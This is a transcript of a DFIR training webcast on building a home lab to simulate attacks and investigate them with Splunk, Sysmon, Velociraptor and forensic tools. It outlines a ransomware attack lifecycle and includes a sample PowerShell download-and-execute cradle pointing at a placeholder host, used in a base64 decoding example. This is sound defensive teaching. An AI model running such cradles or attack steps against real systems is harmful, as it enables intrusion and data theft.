
Home Labs: Attack and Defend Your DFIR Lab

This webcast was originally published on September 12, 2024.

In this video, Markus Schober discusses how to set up and use attack and defend labs for incident response and digital forensics. He explains the importance of building realistic enterprise environments and the value of tools such as Sysmon, Splunk, and Velociraptor for monitoring and analysis. Markus also covers the incident response lifecycle and provides insights into creating effective forensic workstations using both free and commercial tools.

  • Building a lab environment can significantly enhance your understanding of enterprise environments and attack/defense techniques.
  • Sysmon is a powerful tool for logging detailed system activities, which is crucial for forensic analysis.
  • Creating a realistic lab setup with tools like Splunk and Velociraptor can simulate real-world attack scenarios for better learning and preparedness.

Transcript

Markus Schober

Welcome everybody to this quick presentation on Attack and Defend Your DFIR Lab. As Zach was just referring to, I might be a little bit tired for this because I'm actually jet-lagged, just arrived in Europe, but we are going to make it through the next hour, and I'm actually really excited to talk about it because that's something I haven't really presented on.

I've been on this webcast before, but not on exactly that topic, and I think it has helped me a lot in my career, so I'm happy to share it with you.

So for today I actually even have a proper introduction slide. For those who don't know me, my name is Markus Schober and I run an independent blue team training and consulting company.

So everything training and consulting on the blue team side of things, skills development, all kinds of services, is what I started about two and a half years ago.

And so I'm the founder and trainer here at Bluecape Security, but I gained my experience as a principal digital forensics and incident response consultant and manager working on the IBM X-Force incident response team for a very long time, like seven or eight years.

I've gone through all the phases, from APT investigations into ransomware, ransomware and even more ransomware. My primary job was leading these investigations on the strategic side and on the tactical side, performing forensic investigations all the way from start to finish, end to end.

And so all this experience was pretty valuable, and that's what I'm sharing with you in those webinars, those workshops, the courses that are out there.

But before that I always had a technical background. I started out as a software engineer and security consultant, doing software engineering, security, and security orchestration and automation, which was a really early thing like ten years ago. I did that for quite some time to gain my initial experience in how a SOC works, SOC environments and so on.

So that’s where the experience came from. And I’m happy to share something about the incident response and digital forensics attack and defend labs and how they have helped me and how they can help you for professional use and also for personal use.

So this talk is again something that you can apply in professional environments, but also for personal use. I know lots of people here have labs and try to attack and defend already, so hopefully there's something good for everybody here.

Now, first of all, by building out a lab you acquire foundational knowledge of enterprise environments, and this is actually one of the biggest things that I think most people underestimate.

Just by starting to build a VM on anything, you first need to figure out your hardware, or maybe a cloud environment, and then you need to set up a hypervisor and figure out how to get virtualization going.

And then you build your VMs on top of it, and then you connect them, and then there is Active Directory, potentially, hopefully, and all these things. So you really learn a lot of things that you aren't really taught otherwise.

If you're just a classic blue teamer or red teamer, it's all around those enterprise environments, but building them from scratch can also help you a lot.

And then, once you have your lab up and running, you can of course gain more knowledge and better understand what it takes to use those attack tools and frameworks.

Knowing the attacking infrastructure goes a long way, especially on the blue team. I'm a big fan of people on the blue team side trying out and better understanding those red team tools, attack tools, and vice versa.

This is just where you'll gain the most experience. Then once you run those attacks, you can develop expertise in how to detect and then also investigate and analyze those attack techniques.

And that's where you develop those forensic skills and detection skills. And obviously, by better understanding how to detect those, you can improve: you can better understand what telemetry you need and increase your visibility to actually get better at detection engineering and, ultimately, preventing those attacks.

So lots of good stuff you can take away from there. Now, there's one thing: I was actually asking people pretty recently what kind of DFIR technology they find most challenging in enterprise environments.

And that actually helps us a lot with our labs here, because this is interesting: across different platforms there were very similar answers. Most people are challenged by performing forensic analysis, then incident response automation, then data collection, and not so much by using those SIEM, EDR, or NDR tools. But these are all things you can actually get better at by using a lab.

When you attack and analyze your lab, you can apply forensics tools, you can do data collections, you can even improve those response processes, those forensic processes.

So these are all good things that you can get out of using your own lab. Now, what are some of the lab components, the initial foundational baseline of what you need?

I already mentioned that earlier a little bit. But the goal here is that we want to have a simulated but yet realistic enterprise environment. There are maybe some things you can learn by using individual VMs and doing certain things, but when it comes to realistic training, we actually want to resemble or simulate something that replicates what's going on in an enterprise environment.

And by that I specifically mean a domain controller, Active Directory, joined clients, and things along those lines. On top of some of the tools, we also want to execute real-world attack techniques.

And for that we need some of the real world tools that you find out there. And many of them are open source, so it’s pretty easy to get them. We want to make sure that we capture the right data.

So logs and telemetry, so that we can actually understand what we are looking at, right: understand what it took for an attack technique to be carried out, and then understand where we can find the evidence and those traces, the events in the logs and the telemetry that we need. And then conducting forensics and incident response, which goes from using those SIEM tools and EDR tools all the way to performing digital forensics on disk images and memory images.

So a simulated yet realistic environment, and a very realistic process, to perform attack and defense.

So the basic components look something like this. I like to show that as a guest environment, a virtual environment within a hypervisor.

Across the next couple of slides you will also constantly see links. All these things that I'm talking about here are documented as tutorials on my website, bluecapesecurity.com.

Under "Build Your Lab" you have step-by-step instructions, for free of course, where you can find how to build the kind of environment that you see here by adding VMs to a hypervisor such as VirtualBox.

Then you basically make a Windows server and promote it to a domain controller, you install Active Directory, and then you join the Windows client to it.

And then you basically have two systems that talk to each other, and that's what the core of an enterprise environment looks like: you have domain services and Active Directory, and the Windows client can authenticate against the domain controller.

So you basically have the basics, everything that you need in order to have a pretty realistic environment.

And on top of that we also want to have an attack lab. When we're talking about attacking this infrastructure, the easiest way is to just throw an attack VM into the same virtual lab for testing purposes.

Obviously that's always fine, but it's within the same IP range. If you want to get fancy, of course, you can maybe put a Kali Linux box behind a more realistic attack infrastructure, somewhere in the cloud maybe.

But the point really is just to be pretty transparent, so the attack lab can easily access your environment and vice versa.

But all you need is a user, a domain controller, and an attack lab, or an attack VM. And again, you can find how to set it up in the link below. From there, once we have the baseline, we can talk about what tools we as defenders would like to have in this lab.

And that gets us into adding extra tools, installing things, adding telemetry to it. But first of all, we need to understand what you can see in a SOC environment.

In a security operations center (those who work in or operate SOCs know exactly what I'm talking about here; for those that are not too familiar with it), you have analysts that are constantly monitoring for events and alerts.

If anything malicious shows up in the events, they take them, investigate them, and see if there's anything bad, anything that needs to be escalated, any incidents, or they can close out the event, the issue.

And to do so, you usually have a couple of tools available. The basics are described in the SOC Visibility Triad, which was described by Gartner.

What it says is that, for the longest time, we've always had SIEMs. Those are the tools that collect all the events and the logs from all kinds of different systems in the environment.

And then next were the endpoint detection and response tools, speaking of CrowdStrike and things along those lines. Those are the tools that have agents installed on your virtual machines or on your endpoint systems, and they are constantly checking in with the server.

And within the server you can then see anything that's going on on the endpoint. So it collects telemetry, does a lot of analysis and correlation, and it automatically creates alerts if it detects malicious behavior.

But long story short, you see specifically what's going on on the endpoint. And then third, which is more of a current trend, there is also the network, and there's data traversing the network.

If we had visibility into that, that'd be great. And that's called NDR, network detection and response. Same idea as EDR, but with network telemetry and network data.

And the fanciest term these days is XDR, which basically combines all three tools and the data of all three tools, and tries to make sense out of it.

And of course there are very advanced ways. I don't want to get into this too much, but basically those are the three different angles that we can look at in a SOC environment.

Ideally, when it comes to investigating and detecting potential malicious activity. So how can we get to this point?

Now we have a few options here. You can see there's the lab that we talked about earlier, and to that lab we now want to add a SIEM tool.

There are a few tools out there; most people are probably familiar with ELK, or Elastic, and also Splunk, most commonly. And the good news is you can actually install Splunk, which is pretty straightforward, for free in your lab.

There's a trial version, or there's a free license option. So you basically switch the licensing to free; it's limited, but enough for a lab.

Use Splunk on your systems, on your lab environment, and it gets you the same interface as the professional version. Everything you do in there replicates exactly what you would see in a professional environment.

This is really cool, but this is a tool that needs to have those events forwarded into the server system, and it depends on where you install the server.

Here you can see Splunk is installed on the host environment. You can have an extra separate VM for that, if you have extra capacity in terms of RAM and CPUs, or you can install it on your host.

But wherever the server is running, you then need forwarders on those Windows clients. The forwarders installed on those clients send the event logs of those systems to the Splunk server.

And that goes basically in real time. So whenever you open your Splunk console, you see data that you just collected from those systems. And if you imagine that in enterprise environments, where you have thousands of systems forwarding events into a system like Splunk, into the SIEM, that's where you can really correlate and search for potential malicious activity.
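Besides forwarders, another common way to get events into Splunk is its HTTP Event Collector (HEC). As a rough sketch, this is what building an HEC request for a single Windows event looks like; the endpoint path and `Authorization: Splunk <token>` header format come from Splunk's HEC documentation, while the host name and token here are made up for illustration.

```python
import json

# Sketch: build a Splunk HTTP Event Collector (HEC) request for one event.
# /services/collector/event and the "Splunk <token>" header are the documented
# HEC interface; splunk.lab.local and the token below are hypothetical.
def build_hec_request(event: dict, host: str, token: str):
    url = f"https://{host}:8088/services/collector/event"
    headers = {"Authorization": f"Splunk {token}"}
    payload = json.dumps({
        "host": event.get("Computer", "unknown"),
        "sourcetype": "WinEventLog",
        "event": event,
    })
    return url, headers, payload

url, headers, payload = build_hec_request(
    {"Computer": "WIN10-CLIENT", "EventID": 4624, "User": "lab\\alice"},
    host="splunk.lab.local",
    token="00000000-0000-0000-0000-000000000000",
)
# The payload could then be POSTed with urllib.request or requests.
```

In a lab this is handy for replaying saved event logs into the SIEM without installing a forwarder on every box.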

Of course, that's a lot of data in there; that's why we are constantly overwhelmed. So ideally you can tune it and make it easier for analysis, but that's pretty straightforward to do in your own lab.

You can just go ahead; there's also a tutorial up there to set up Splunk for free, even on video, including the forwarders as well as the server side of things.

And then we also have another couple of options for EDR. Now, EDR is actually one of the most expensive tools.

Splunk is expensive too, of course, but EDR is really pretty hard to get because there aren't really any trial or free versions out there, speaking of CrowdStrike and SentinelOne, which are the two most common ones.

So getting that into our lab is probably not so easy. But there is another tool called Velociraptor. I'm sure lots of people have heard about it already; I also cover it in our workshop. Velociraptor is somewhat like an EDR because there's also a server that you install, and agents installed on the endpoints, on those Windows systems, and those agents are constantly calling in, checking in with the Velociraptor server.

With the Velociraptor server you can apply real-time forensic analysis at scale, basically across all the systems that have the agent installed.

You can basically run your forensic analysis from within the server console, and it automatically applies to all the hosts that are in scope.

And that can be done across thousands of hosts. It's very scalable, and you can then perform initial analysis, just like you would do in an EDR.

That goes a little deeper than just looking at logs, for example in Splunk. So that's obviously another really helpful tool, and I highly recommend checking it out.

And the good thing is Velociraptor is open source, so you can actually use it for free. One thing that's out of scope in this diagram: it would of course be a huge bonus if you can also add network captures or logs. For that, there are a couple of images out there.

But what you see here is basically what I would set up for any workshop that I run. For example, at Wild West Hackin' Fest I run the ransomware attack and defense class.

Every student gets this setup. This is what we use to attack our lab environment on day one, and this is what we use to investigate our lab environment on day two.

So those are the main components; that's everything you need. From there on you can attack whatever you want based on the tools you have on Kali, and then you can also use the other tools, the defensive tools, the DFIR tools, for the investigation.

Now, there are a few things that, out of the box, don't just work like this. You need to add a few settings. For example, if Windows Defender is on, it's not so easy to just run attacks on this.

So for a lab environment, depending on how sophisticated you want to get, I would turn off Defender; that makes sense. And then, just as in any production environment, there's some tuning we can do, for example adding some visibility with PowerShell logging and Sysmon logging.

Those are the two basic setups I would recommend here. So first of all (not sure if you can read that, but that's basically the Group Policy editor), you can set settings for PowerShell logging.

By default, Windows PowerShell has a "Windows PowerShell" log that records the execution of PowerShell and some additional context. But there's more we can do, with settings such as module logging, script block logging, transcription logs and things along those lines.
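These Group Policy settings correspond to well-known registry values under `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell`. As a sketch for a lab box without a domain GPO, this emits the equivalent `reg.exe` commands (to be run in an elevated prompt on the Windows client); the value names shown are the documented policy values.

```python
# Sketch: map the PowerShell logging GPO settings to their registry values
# and emit reg.exe commands for a standalone lab machine.
BASE = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell"

settings = {
    BASE + r"\ModuleLogging":      {"EnableModuleLogging": 1},
    BASE + r"\ScriptBlockLogging": {"EnableScriptBlockLogging": 1},
    BASE + r"\Transcription":      {"EnableTranscripting": 1},
}

def reg_commands(cfg: dict) -> list:
    """Build one 'reg add' command per policy value."""
    cmds = []
    for key, values in cfg.items():
        for name, data in values.items():
            cmds.append(f'reg add "{key}" /v {name} /t REG_DWORD /d {data} /f')
    return cmds

for cmd in reg_commands(settings):
    print(cmd)
```

Transcription additionally takes an `OutputDirectory` value if you want the transcripts written to a central share.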

That is all additional information you can get out of a system whenever PowerShell executes. The really, really cool one is PowerShell script block logging, because that is the one that actually captures the payload of the script.

If PowerShell gets executed with a certain script or payload, it even logs the payload within the script block in the event. If there's not enough room in one event, it logs multiple events across your event logs with the content of this particular execution.

And that can be extremely helpful, because then you basically have the full script and can see what's running. On another point, script block logging also automatically adds warnings if it detects something that even looks suspicious.

It does that by matching certain keywords; there's a list of keywords it looks for, and it adds a warning onto these events that are logged.

Additionally, note that lots of payloads these days are base64-encoded when they get executed. Script block logging actually logs those payloads in decoded form.

So you don't even have to do the base64 decoding anymore, because it logs the payload after it has been decoded. That is actually one of my favorite event logs to look for, if it's available, when I perform an investigation.
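For cases where script block logging isn't available and all you have is the encoded blob from a process command line, the decoding is easy to do yourself: PowerShell's `-EncodedCommand` argument is base64 over the UTF-16LE bytes of the script. A small sketch (the sample script is made up):

```python
import base64

# Sketch: decode a PowerShell -EncodedCommand payload.
# -EncodedCommand is base64 over the UTF-16LE bytes of the script.
def decode_powershell_payload(encoded: str) -> str:
    return base64.b64decode(encoded).decode("utf-16-le")

# Build a sample blob the same way an attacker-side encoder would:
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/p')"
blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")

print(decode_powershell_payload(blob))
```

The UTF-16LE step is the part people usually miss; plain `base64 -d` output looks like the script with null bytes between the characters.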

Secondly, of course, the way to get the most visibility into what's going on on an endpoint is by adding Sysmon.

Sysmon is basically a driver that creates an event log, and within that event log it captures much more granular data about anything that is going on within a Windows system.

Most of you are probably familiar with Sysmon, but it really can be extremely helpful. If you have Sysmon available, that's basically all you need to understand an entire investigation, because it captures events such as event ID 1, which is process creation.

When a process is created, Sysmon captures the process ID and the image, which is basically the executable of this process. It also captures where it was executed from.

It would capture the command line, the command that was used to execute this particular process. So you can see even the command line arguments that come with it.

You can see the user associated with the session, the logon IDs. And on top of that, there's the hash of, in this case, PowerShell.

And then it also adds information about the parent process: the parent process ID and image. In this case cmd.exe, the parent, executed PowerShell.

We can see that here: cmd.exe was executed to trigger PowerShell, which in this case would then execute regsvr32.exe. And then you can also see globally unique identifiers that are associated with the parent process.

So not just the ID, but a unique ID that you get for the parent as well as for the current process, over here, somewhere up here: the process GUID.

So basically there's a unique ID that you can use to search for anything that this process did across your entire logs. Once you have identified a malicious process, you can take this globally unique identifier and search for it across your logs, and you get an entire list of all the events associated with this process.
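The pivot described above can be sketched in a few lines. Assume the Sysmon events have been exported into a list of dicts whose keys match Sysmon's EventData fields (ProcessGuid, EventID, Image, and so on); the GUID placeholders and events below are made up for illustration.

```python
# Sketch: pivot on a Sysmon ProcessGuid to pull every event one process
# generated. Real ProcessGuid values are brace-wrapped GUIDs; GUID-A/GUID-B
# are stand-ins here.
def events_for_guid(events, guid):
    """Every event tied to one process, in log order."""
    return [e for e in events if e.get("ProcessGuid") == guid]

sample = [
    {"EventID": 1,  "ProcessGuid": "GUID-A", "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1,  "ProcessGuid": "GUID-B", "Image": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 3,  "ProcessGuid": "GUID-A", "DestinationIp": "10.0.0.5"},                 # network connection
    {"EventID": 11, "ProcessGuid": "GUID-A", "TargetFilename": r"C:\Users\Public\x.dll"},  # file create
]

timeline = events_for_guid(sample, "GUID-A")
print(len(timeline))  # → 3: the process creation, its network connection, its file write
```

The same idea is what a `ProcessGuid="..."` search does in Splunk, just run against the forwarded Sysmon index instead of an in-memory list.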

And that is really cool. So these are just some enhancements I would add to the lab, and they help a lot. Of course it takes some consideration whether you can add them to your production environment; hopefully you can.

But within a lab environment, I would like to add as much visibility as I can, because I want to learn, right? I want to see, if I trigger something, what happens on my investigator side of things.

And if I don't see anything, then I basically don't know what just happened. Only if I can log all this data can I better understand what it's doing, and then better understand how we could potentially detect it.

So with the lab set up, let's talk real quick about some options for how to execute attacks. We've all heard of or seen real-world attacks, and many of you are probably in some offensive red team role, so you probably know exactly how to do that.

But here's just some inspiration: how would that go down if we want to perform a somewhat realistic attack in our lab environment? For that, we would now turn to our Kali box.

Kali comes with a whole lot of tools out of the box, and we can easily install a few more, for example command and control frameworks, and then start a compromise and initial access onto our Windows client.

Once the Windows client is compromised and we have control over it, we can operate on the Windows client and maybe try to add persistence.

As you can see on the left-hand side here, you then have command and control access to it, and you can execute commands, you can execute shell commands, or use living-off-the-land binaries, which is very common.

You can try to escalate or elevate privileges in order to then pivot over, to move laterally to the domain controller. You can learn and play around with understanding the credentials you need in order to perform lateral movement,

using techniques such as pass-the-hash, pass-the-ticket, things along those lines. You can also look into what the most common techniques are for data exfiltration, and you can run some ransomware simulators.

There are a few out there; if you just look them up on GitHub, for example, you might find a few really cool ones. So these are all the things it takes to create attack patterns that are pretty realistic, right?

We don't need fake data, we don't need fake anything. You basically attack and try to emulate all the different tactics that you see in real-world cases. And for some inspiration, of course, there are attack reports out there.

There are some trend blogs out there by some of the vendors; oftentimes they blog about a certain attack, even with the IOCs and the specific tools that were used.

And one thing you can use: if you've noticed, there's a link down here on the slide, "attack and defend your lab". That's a video I did on starting this attack on this lab, going all the way to getting a foothold, executing scheduled tasks for persistence, and then how we would go about the investigation.

So there's a free video you can check out on that as well, to get a better idea of how you would operate this command and control kind of attack from there on. For a blue teamer, that might be really helpful;

this kind of video may be pretty straightforward for red teamers, but still, this is the thought process behind it.

So this is a slide that some of you that have been in my webinars before might have seen, but I just love to use it over and over and over again because it is still very true.

It describes a generic but somewhat detailed ransomware attack lifecycle, and this is most of the time pretty accurate.

Some of the tools might change, but the phases or stages are oftentimes the same. So if you want to emulate that (this is what we also do in our Wild West Hackin' Fest workshop, for example), these are exactly the steps that we would apply in our lab and then investigate.

The first stage is always initial access. A threat actor needs some type of access to a system first of all, in order to even infiltrate the environment and go from there.

And that usually starts with what we see on a daily basis: phishing emails, exploiting some kind of service, anything that just gets them an initial foothold on a system.

And from there, this particular tool, or whatever they were able to run, the malicious binary that just got onto the system, would create a persistence mechanism and call back to the malicious server, so that the threat actor can control the machine and from there provide access to the second-stage attacker.

This is mostly initial access. From there, somebody taking over the post-exploitation would probably come in and use this initial command and control to deploy their own tools.

Oftentimes that's something like the Cobalt Strike command and control framework, because that's pretty powerful. And from there they start with reconnaissance: trying to figure out what's on the system, any weaknesses, any potential privilege escalation they could do there,

gathering information about the environment, some discovery around the local system, Active Directory, domain admins, domain controllers, file shares that might be available from the compromised system and user.

And then ideally there’s enough information to move laterally to a different system. If you have a bigger lab, of course you want to pivot across multiple systems.

There might be some critical systems, some less critical systems, but you basically just move laterally in order to, at some point, get a good idea of the environment and be able to target the data that you're after.

And oftentimes that brings us into stage four. You target the data, which is oftentimes on a file share or somewhere else, and you have to stage it:

copy it somewhere where you can then ideally just exfiltrate it out of the environment. For that you would use rclone, some FTP client, or whatever;

those are the most common ways threat actors do it. And then finally, as you oftentimes see when ransomware threat actors really get all the way through: at the end, they trigger the ransomware across the environment with the privileges that they have gained, domain admin privileges for example, so that they can execute binaries across all the systems that they know about.

And that executable would be the ransomware binary, which then starts encrypting all the files and data and sharing the decryption keys with the command and control, the ransomware server infrastructure.

That’s what you’re basically left with when the attack is carried out. That is from start to finish, how an attack like this would go down.

And as an analyst, that oftentimes is what we are left with. In the worst-case scenario, organizations only figure out, or notice, the compromise by the execution of ransomware, which means we are already over here.

So all these things already happened beforehand. Now we need to first of all contain the damage, but also figure out everything that happened beforehand if we really want to do root cause analysis and understand the scope of the compromise.

And that's where we come in now as the investigator. So here's just another quick view. Like I said earlier, when we carry out the attack, in this case there's Empire installed on the Kali box.

With Empire, you create a payload, deliver it to the Windows client, and execute it. And this is a screenshot of Empire having just received a new agent.

So this is the command and control, the beacon, the agent that we can communicate with in order to execute everything that we just covered in the ransomware attack lifecycle. And again, this is the video you can watch to see how this can go down, how this worked out in my own lab.

So with the attack carried out, we can now think, since the goal here is a DFIR lab, about how we would respond.

Now, there are a few things. First of all, people are probably familiar with the incident response lifecycle. But really, how I would look at this from a realistic perspective of how we would start this investigation in a large environment:

we would initially probably get into our SIEM, in this case our Splunk, because we first need to even identify any potentially compromised system and the scope of it.

So if we know there's a certain executable, that ransomware executable that was executed on multiple systems, or a particular compromised user, we can run through the Splunk logs and identify potentially any endpoints that might have had the user log on or the ransomware execute.

So we get a better scope of anything that might already be compromised, because from there we can start a more targeted analysis.

And for the analysis, the first step before we can dive deeper: I mentioned EDR before, and that is a really good option, of course. With Velociraptor, this is where we could ideally then perform forensics, to some extent, at scale.

So we would open Velociraptor and run a hunt, an investigation, basically to carry out a particular task across a subset of systems, or all the systems.

For example, if there is a malicious phishing email or a phishing attachment, you can search for any system that contains that particular file name. You can even perform

Yara searches across systems for, say, a particular malicious binary or some malicious code running, and you can check for scheduled tasks that any system might have.

You can basically run all the forensic artifacts across your environment with Velociraptor. And this is pretty cool because you can then get an even more granular idea of the scope, anything that is not captured in event logs.

Now we can look a level deeper, a little more detailed, and from there we might better understand which systems might have been used for initial access, which system might have been used as a pivot point that a threat actor moved onto laterally, which systems might have been the ones data was stolen from, or where they actually staged the data in order to exfiltrate it.

So then we can better, assign labels, even in velociraptor onto these, hosts and then decide, a more targeted analysis approach.

On which systems do we need to take a much closer look on now, based on priority, which ones are the systems of interest, which ones are the system that are really critical for the next step that we need to look closer into understanding how did they get on there?
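Real Velociraptor hunts are written in VQL; as a rough illustration of the same idea, here is a Python sketch that sweeps invented per-host file inventories for a phishing attachment name (the inventory structure is made up for illustration):

```python
# Toy stand-in for a Velociraptor filename hunt: sweep per-host file
# inventories for a suspicious attachment and flag the endpoints holding it.
def hunt_filename(inventories, needle):
    """Map hostname -> matching paths for a case-insensitive filename hunt."""
    hits = {}
    for host, paths in inventories.items():
        matches = [p for p in paths if p.lower().endswith(needle.lower())]
        if matches:
            hits[host] = matches
    return hits

inventories = {
    "WS01": [r"C:\Users\bob\Downloads\invoice.pdf.exe", r"C:\Windows\notepad.exe"],
    "WS02": [r"C:\Users\amy\Desktop\report.docx"],
}
print(hunt_filename(inventories, "invoice.pdf.exe"))
```

The real tool does this agent-side across live endpoints (and adds Yara, registry, and scheduled-task collectors); the sketch only shows the shape of the result — host-to-evidence mapping.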

What did they do on there? To get the data for forensic analysis, we need to perform a data collection.

And data collection is something that can be done in many different ways. I was actually on an Anti-Cast session here a couple of months ago where all we did was talk about the forensics process and how critical data collection is.

Because if you mess up the data collection, you basically don't have anything to analyze. First of all, you need your data collection done before you can actually get to the analysis process.

This is an often overlooked issue, because sometimes you don't even have a good handle on the systems that are currently compromised. What if they are on a different continent, in a different geography?

What if they are in a cloud environment that your CSIRT or SOC team might not have access to? All these processes ideally need to be established proactively, before you have to figure them out when it's urgent.

You can also use Velociraptor, for example, to perform data collections across systems. Data collections can be done by capturing memory or capturing a disk image.

Those are large files — gigabytes or terabytes in size. It's a pretty slow process, but sometimes that's needed. Although we usually don't need all the data: on a Windows system, for example, there are just a few Windows forensic artifacts that are really critical for our investigation later on.

For that, we can create what are called triage collections, where we just collect some of the data we need from those systems — that's of course a much smaller collection.

At the end of the day it might just be maybe 300 or 500 megabytes per system instead of gigabytes per system. And that's more doable.

We can collect those from multiple systems and then move to the forensic analysis, where we can really perform a detailed offline analysis system by system, looking into all the Windows artifacts to answer questions we might not have been able to answer previously.

So this is how the steps typically go down, and this is what you can also do easily within your lab environment: go from the SIEM, then to Velociraptor or EDR, perform a data collection, and then look at the data on your forensic analysis system.

So here you can see the beauty of Splunk — you can even do visualizations to better understand, for example, which systems connected where and on which ports. And then here you can see Velociraptor.

This is basically the list of systems we would have available, and you can interrogate them and run hunts across those systems. But at the end of the day, if we perform a forensic analysis, we need tools — and we haven't talked about the analysis tools or lab yet.

So for the remainder of this, I want to give you a couple of tips on how you can build a really nice forensic workstation with free tools that works pretty well.

Now let's think about what we're actually trying to accomplish, and that might differ — there's no one-size-fits-all forensic analysis workstation. You might have to analyze Linux systems one day, Windows systems another day, Mac systems another day.

It might be some logs — there are all kinds of requirements. So it's best to first understand what you are looking for and then create a specific, purpose-built lab or analysis machine for that.

So you need to deal with data acquisition first; we already covered that. But once you have data, you might have to mount it and process it — disk images, memory images, logs. Then you would have to look into the memory images, the disk images, and the logs, and those are all different tools that you might need.

And then there's potentially even malware, so you need some basic tools to perform malware analysis. And finally there's something called timeline analysis, where you basically parse all the artifacts you have, sorted by time.

So you have, in chronological order, kind of everything that happened on the system — which is usually a lot of data, but with that you might be able to close some gaps and see what happened in between, in timeframes where you might not have had any visibility with any previous analysis technique. Then you might move into reporting. So there are a lot of tools and a lot of considerations, and each one of these requires its own set of tools and skills.
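The timeline idea can be shown with a tiny Python sketch — hand-made records standing in for real parser output (MFT, event logs, etc.), merged and sorted chronologically:

```python
def build_timeline(*sources):
    """Merge parsed artifact records and sort them chronologically.
    ISO-8601 timestamp strings sort correctly as plain strings."""
    merged = [row for src in sources for row in src]
    return sorted(merged, key=lambda r: r["timestamp"])

# Invented sample records standing in for real parser output
mft = [{"timestamp": "2024-05-01T10:02:00", "source": "MFT",
        "msg": "locker.exe created"}]
evtx = [{"timestamp": "2024-05-01T10:01:30", "source": "EVTX",
         "msg": "Event 4624: logon by svc-backup"},
        {"timestamp": "2024-05-01T10:05:10", "source": "EVTX",
         "msg": "Event 7045: new service installed"}]

for row in build_timeline(mft, evtx):
    print(row["timestamp"], row["source"], row["msg"])
```

Tools like Plaso do exactly this across dozens of artifact parsers at once; the payoff is the same — events from different sources interleave in time and the gaps between them become visible.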

So we have a few questions, right? We need a system that we can use for triage and for the analysis of disk images, memory images, and various logs.

Do we have network captures, network logs, pcaps? And how deep can we go with malware analysis? Secondly — and this is actually pretty interesting, especially when it comes to a production environment where you might have to set up your forensic lab — where do you host it? Do you need a physical system, because they are pretty powerful? Or can you go virtual? The trick with virtual is that you basically destroy your VM when you're done, and you have a brand new one easily available as soon as a new case comes in.

That's really cool. Then you need to think about whether you need a Linux or a Windows system, because some forensic tools only run on Linux and some only on Windows. And do you want individual tools, or do you want suites, where you basically have one powerful forensics tool that parses out a lot of information for you?

Those are pretty slow but powerful. Or do you want individual small tools to get the quick wins — depending on what you're more familiar with, or what does the job best for you.

And then, obviously, for production or enterprise environments: do you go the commercial route, or do you prefer open source? There's obviously a big price tag on the commercial ones.

Now here are a few options that are ready to go. People have built entire VMs before for the purpose of forensic analysis.

Here are just a few screenshots of logos of the VMs that are out there. The first one, for example, is the SIFT Workstation, which has a bunch of forensic tools on it.

It's based on Linux and it's provided by SANS, who use it for their workshops. And as long as you are fine with just using Linux tools for your analysis, that's definitely a great forensics option.

Now there are a few other VMs that might not be built exactly for disk or memory analysis, but they can still get you pretty far. There's the FLARE VM, provided by Mandiant, which has mostly been built for malware analysis — but it's on Windows, so you get a ton of tools you can install on a Windows system.

REMnux is another malware-focused VM, also maintained by people from SANS, and it helps a ton with malware analysis — but it's on Linux. Then, as we all know, there's Kali.

And Kali actually also has a number of tools that can be pretty handy for some forensic analysis, and you can easily add tools, obviously. So it really depends — these are just VMs you can download and install right away and get going.

Now they all have pros and cons. I usually prefer to build my own VM, because I just want the few tools that I like and nothing else — and that was mostly on Windows.

So here is a list of tools; you can also find it on my website. There's a build-your-forensic-workstation tutorial, and aside from how to build the entire VM, there is a list of recommended tools — the ones that I really think can be very helpful.

When you perform forensic analysis, you usually need to mount a disk image, and that can be done with Arsenal Image Mounter, which is by far the best tool out there. Or you can also use FTK Imager.

It also has additional views where you can open files and folders from there, which can be pretty helpful. Now, speaking of the suites, there are free ones, which is where Autopsy can come in.

The Sleuth Kit and Autopsy form a forensic suite that already does a lot of parsing for you as soon as you start a new project and analysis with it.

You can also run KAPE, the Kroll Artifact Parser and Extractor, which can help you extract data from a disk image, or automatically parse it by applying parsers such as Eric Zimmerman's tools.

Those are my favorite tools for Windows analysis. When we're talking about individual tools and the artifacts we would often look into: for browser analysis, there is NirSoft's BrowsingHistoryView, which is free and basically parses out the browsing history of the most common browsers. That's really cool, because then you can see the browsing history and the stuff that was downloaded by the user.

So if you need to look into browsers, that's a good tool. Now, for parsing or analyzing memory, there is obviously Volatility, which is the biggest, most common tool out there.

There are a few other options, some of which might be more compatible with Windows, such as MemProcFS. Then there are the typical Windows forensic tools that Eric Zimmerman has written, and a few additional ones such as RegRipper, which just does a few things a little differently and can also be very helpful for parsing registry hives.

Eric Zimmerman's tools, for those who are not familiar with them, basically include a parser for almost every single artifact on Windows. You can turn each artifact into data such as a CSV, look at it in chronological order, and find the badness that you're looking for.

For malware, there's a ton — you can go as deep as analyzing assembly code. But for quick triage and quick wins, just figuring out what the malware might be doing:

There is a tool called PE Studio that gives you a ton of information about portable executables. CyberChef, of course, is a tool that can help a lot with encoding and decoding payloads that you might dig up from logs, like PowerShell payloads.

A shellcode debugger such as scdbg is great for decoding shellcode and getting a better understanding of indicators — network artifacts and IP addresses that might have been buried in the shellcode.
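One CyberChef-style quick win can even be done in a couple of lines of Python: PowerShell's `-EncodedCommand` argument is Base64 over UTF-16LE text, so a suspicious command line pulled from the logs decodes in two steps (the payload below is made up for illustration):

```python
import base64

def decode_powershell(b64):
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

# Made-up sample payload, encoded the same way PowerShell would expect it
payload = base64.b64encode(
    "IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()
print(decode_powershell(payload))  # → IEX (New-Object Net.WebClient)
```

CyberChef does the same transformation with its "From Base64" and "Decode text (UTF-16LE)" recipe steps, plus many more chained operations.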

For timelines, as mentioned before, Plaso (log2timeline) is pretty cool. Now, this is just a quick set of tools that I would often refer to and use when I perform an analysis and when I build my own forensic workstation.

The one thing then, though, is: how can we do all these steps? There are so many things we have to do manually, and it can take a pretty long time to get all the way from start to processed data.

Sometimes the processing itself takes hours or days — if you do timelining, for example, and then look at every single artifact on the disk and in memory at once.

In this case, dozens of artifacts — we could potentially look at event logs, and processing those can take hours or even days per system. So the one thing I wanted to leave you with as well is that there are ways to automate all of this in a really cool way.

There are actually many ways, but one that I wanted to show is something like this. If we think about what we need: we just want to have all that work done for us, and then be able to look at the output and figure out what the malicious behavior was.

